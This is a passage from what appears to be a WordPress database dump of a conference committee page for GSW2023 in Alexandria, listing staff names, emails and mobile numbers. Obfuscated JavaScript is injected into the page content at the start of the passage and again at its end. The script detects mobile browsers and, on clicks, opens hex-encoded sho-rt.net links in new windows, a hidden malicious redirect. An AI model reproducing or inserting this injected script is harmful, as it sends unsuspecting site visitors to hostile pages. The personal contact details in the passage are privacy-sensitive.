_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-09-06 06:20:01','2023-09-06 06:20:01','',4849,'https://gsw2023.com/?p=5465',0,'revision','',0),
(5466,1,'2023-09-06 06:20:50','2023-09-06 06:20:50','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/IMG-20230905-WA0015.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Mohamed ElQurashi</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Systen Admin</span>\r\n<span style=\"font-size: 12pt;\">m.elqurashi@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201003348433</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Systen Admin</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 